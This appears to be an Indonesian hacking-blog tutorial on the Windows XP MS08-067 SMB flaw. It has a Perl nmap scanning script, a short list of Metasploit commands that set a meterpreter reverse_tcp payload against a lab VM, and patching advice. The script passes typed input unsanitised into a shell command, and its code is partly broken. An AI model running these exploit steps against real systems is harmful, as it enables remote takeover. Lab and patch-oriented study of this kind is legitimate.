//h3ll0s

SMB Scanning Vulnerability

2:25:00 AM | Labels: Exploits | No comment yet

Kita tidak akan sadar bahwa pada Windows XP ada vulnerability yang sangat serius. Berdasarkan pengalaman saya, setelah install Windows XP, saya kira aman – aman saja dan ternyata di website resmi microsoft menyebutkan vulnerability pada netapi32.dll / ms08_067. Vulnerability ini ditemukan pada tahun 2008 di CVE-2008-4250. “An attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit” inilah yang disebutkan di situs Microsoft. Saya akan memberikan step by step untuk mengidentifikasi vulnerability netapi32.dll dan patching system :

Skenario :
Attacker    : Ubuntu 10.04
Target        : Virtualbox Windows XP SP 2

1. Download Nmap
ketik ini pada konsole terminal
sudo su apt-get install nmap

2. Untuk melakukan analisa pada window, saya membuat sebuah code sederhana dari Perl dan memanfaatkan perintah nmap. Kita tidak perlu install Perl di ubuntu karena default Perl sudah terinstall. Copas kode berikut di gedit dan save dengan nama smb_scan.pl :

#!/usr/bin/perl
# Author                       : h3ll0s
# Date                         : 30 Maret 2012
# Tittle                         : SMB Scanning Vulnerabillity
# Spesial Thanks's To : [3rr0r c0de | PasuruanCyber] [BinusHacker]
# Used nmap --script smb-check-vulns.nse -p445
# http://www.nmap.org

use strict;

system('cls','clear');
   system('title SMB Scanning.....');

      print"\n";
      print "\t//+ + + + + + + + + + + + + + + + + +//\n";
      print "\n";;
      print "\t  =    SMB Scanning Vulnerability   =\n";
      print "\n";;
      print "\t//+ + + + + + + + + + + + + + + + + +//\n";
      print "\n";;

print "Masukkan Host : ";
chomp(my $net = );
my $host = $net;
print "Menunggu Proses Scan\n";
print "$host\n";
`nmap --script smb-check-vulns.nse -p445 '$host' >> hasil.txt`;
print "Selesai";

Meskipun tanpa code script Perl tersebut kita bisa mengetikkan perintah ini pada terminal konsole “nmap --script smb-check-vulns.nse -p445 ”
untuk scanning host yang live pada jaringan lokal, ganti code “nmap --script smb-check-vulns.nse -p445” diatas menjadi “nmap -sP” dan disertakan menambahkan ./”24” setelah $net

Kenapa saya mengemasnya kedalam Perl, soalnya saya sendiri sering lupa sama perintah nmap. Maka alternatifnya adalah dengan membuat code sederhana tersebut
 
   
3. Jalankan code tersebut

root@h3ll0s:~# perl smb_scan.pl

    //+ + + + + + + + + + + + + + + + + +//

      =    SMB Scanning Vulnerability   =

    //+ + + + + + + + + + + + + + + + + +//

Masukkan Host : # isikan IP host target yang ingin di scan, misal 192.168.x.x
Menunggu Proses Scan
192.168.x.x
Selesai
root@h3ll0s:~#

proses scanning sudah selesai, saatnya membuka laporan scanning.

root@h3ll0s:~#ls
smb_scan.pl     hasil.txt
root@h3ll0s:~# gedit hasil.txt
inilah contoh isi dari hasil.txt
 

Lihatlah pada line 10

MS08-067: VULNERABLE
Ternyata target memiliki vulnerability ms08_067, dengan memanfaatkan vulnerability tersebut kita bisa melakukan remote system Windows dengan memakai Metasploit


4. Proses Exploit Metasploit Untuk Mendapatkan System Target
Download Metasploit
http://www.metasploit.com/download/

  

Ket :
search ms08_067                    : Pencarian vulnerability ms08_067
use exploit/windows/smb/ms08_067_netapi : Metode pilihan exploit setelah proses search
set payload windows/meterpreter/reverse_tcp : Payload metasploit
set LHOST                             : IP Penyerang
set RHOST                             : IP Target

5. Patching Vulnerability Pada MS08_067 Di Windows
Jangan biarkan Windows kita memiliki vulnerability ms08_067, sangat membahayakan jika ada seorang attacker mengambil alih system32, data pribadi kita bisa saja di hapus, memasang keyloger untuk mencuri informasi, memasang backdoor, mengerikan sekali.

Untuk patching silahkan download dan install dari situs resmi Microsoft
http://technet.microsoft.com/en-us/security/bulletin/ms08-067


Download SMB Scanner Vulnerability
http://pastebin.com/Qdxyra2n

Referensi :
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
Email This BlogThis! Share to X Share to Facebook

Post a Comment

Older Post Home Newer Post
Subscribe to: Post Comments (Atom)

Voice Of GreyHat

Loading...

Exploit Database

Loading...

Labels

  • Exploits (12)
  • Hacking (4)
  • Linux (9)
  • Network (1)
  • Perl (2)
  • Virus (2)
 
© 2011 //h3ll0s | Powered by Indonesian GreyHat Home | RSS | Back to Top